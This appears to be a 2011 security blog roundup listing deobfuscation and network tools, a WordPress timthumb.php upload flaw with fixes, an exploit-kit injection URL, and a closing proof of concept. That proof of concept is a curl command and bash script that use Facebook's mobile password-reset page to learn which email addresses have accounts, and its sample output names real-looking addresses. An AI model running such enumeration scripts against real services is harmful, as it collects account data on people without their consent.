Wednesday, 3. August 2011
Script Deobfuscation Tools
On Wednesday, 3 Aug 2011, in topic 'Tools'
Web pages that host exploits often use a chain of redirects and obfuscated code to make them harder to follow. Useful programs for exploring malicious pages:
* Creme Brulee
http://code.google.com/p/cremebrulee/
* Firebug – Firefox plug-in
http://getfirebug.com/
* Google Chrome Developer Tools
http://www.google.com/chrome/
* Javascript Deobfuscator – Firefox plug-in
https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
* JSDebug
http://www.codeproject.com/KB/scripting/hostilejsdebug.aspx
* Malzilla
http://malzilla.sourceforge.net/
* Microsoft IE8 Developer Tools
http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8
* Microsoft Script Debugger
http://www.microsoft.com/downloads/en/details.aspx?familyid=2f465be0-94fd-4569-b3c4-dffdf19ccd99&displaylang=en&pf=true
* Rhino
http://www.mozilla.org/rhino/
* SpiderMonkey + V8
https://developer.mozilla.org/en/SpiderMonkey
http://code.google.com/p/v8/
* The Mina
http://dontstuffbeansupyournose.com/2008/11/23/javascript-malware-deobfuscation/
nSpaces
On Wednesday, 3 Aug 2011, in topic 'Tools'
nSpaces: multiple virtual desktops with password protection and easy switching
Features of nSpaces
Launch desktops: create multiple desktops on your computer.
Launch apps: open different applications on each virtual desktop to improve your productivity.
Name your space: label each virtual desktop with a tag; the tag is shown on the space switcher.
Change wallpaper: set a custom desktop image for each of your desktops and watch the pictures fade into each other when you switch between them.
Color your space: if you don't want a custom image for each desktop, just set a background color.
Protect your space: if you don't want other users to use your spaces, set a password on them.
Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you create and a hotkey for the space switcher; all of them can be changed.
nSpaces is easy to use: a simple, menu-driven GUI that is quick to configure, change and save.
Download
http://www.bytesignals.com/binary/nspaces/setup.exe
Websitedefender
On Wednesday, 3 Aug 2011, in topic 'Malware Search'
Features of WebsiteDefender
Detect Malware present on your website
Audit your web site for security issues
Avoid getting blacklisted by Google
Keep your web site content & data safe
Get alerted to suspicious hacker activity
Secures against malware and hackers
Keeps your customers data safe
Avoid being blacklisted by Google
Provides WordPress security
Register for a free scan or read more about WebsiteDefender:
https://dashboard.websitedefender.com/register-for-free-website-scan.php
Hexinject - Linux
On Wednesday, 3 Aug 2011, in topic 'Web Security'
Current features of Hexinject:
Inject hexadecimal or raw data onto the network
Sniff data from the network in hexadecimal or raw format
Data can be piped and easily manipulated
Command-line framework for raw network access
Automatically sets the correct checksums (IP, TCP, UDP, ICMP)
Automatically sets the correct packet lengths (IP, TCP, UDP, ICMP)
Download
http://sourceforge.net/projects/hexinject/files/
WordPress image utility - PHP Upload
On Wednesday, 3 Aug 2011, in topic 'Vulnerabilities'
The Exec summary: An image resizing utility called "timthumb.php" is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised.
Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
Android Trojan records phone calls - Android
On Wednesday, 3 Aug 2011, in topic 'Android'
A Trojan spying on your conversations
Source
http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-your-conversations.aspx
Practical C++ Decompilation
On Wednesday, 3 Aug 2011, in topic 'Tutorials'
How to handle C++ decompilation in IDA and the Hex-Rays decompiler (Recon 2011 talk). Slides:
http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf
Recorded talk:
http://www.archive.org/details/Recon_2011_Practical_Cpp_decompilation
Best Pack exploit kit
On Wednesday, 3 Aug 2011, in topic 'News'
New injection URL: 1see[dot]ir/j/, currently leading to a Best Pack exploit kit.
Google Dork
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/
Facebook password recovery
On Wednesday, 3 Aug 2011, in topic 'Vulnerabilities'
Step by step:
- Go to http://m.facebook.com
- Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)
- Try using a real email address and then a fake email address: you will see two different behaviors.
Now try to do a POST request to http://m.facebook.com/reset.php?refid=0, passing an email address through the "ep" variable.
Using cURL:
curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0
This process has no validation against external or forged sites/forms.
Using the script:
#--------------------
#!/bin/bash
# Usage: sh poc.sh mails.txt   (one address per line)
for mail in $(cat $1);
do
# Same POST as the cURL request above. The reset page answers with a form only
# when the address is unknown, so grep's exit status tells the two cases apart.
if curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0 | grep -q form; then
echo "$mail has no account.";
else
echo "$mail has an account.";
fi
done
#+----- EOF ------+
You can enumerate users using a list of email addresses or phone numbers.
$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO
by Zerial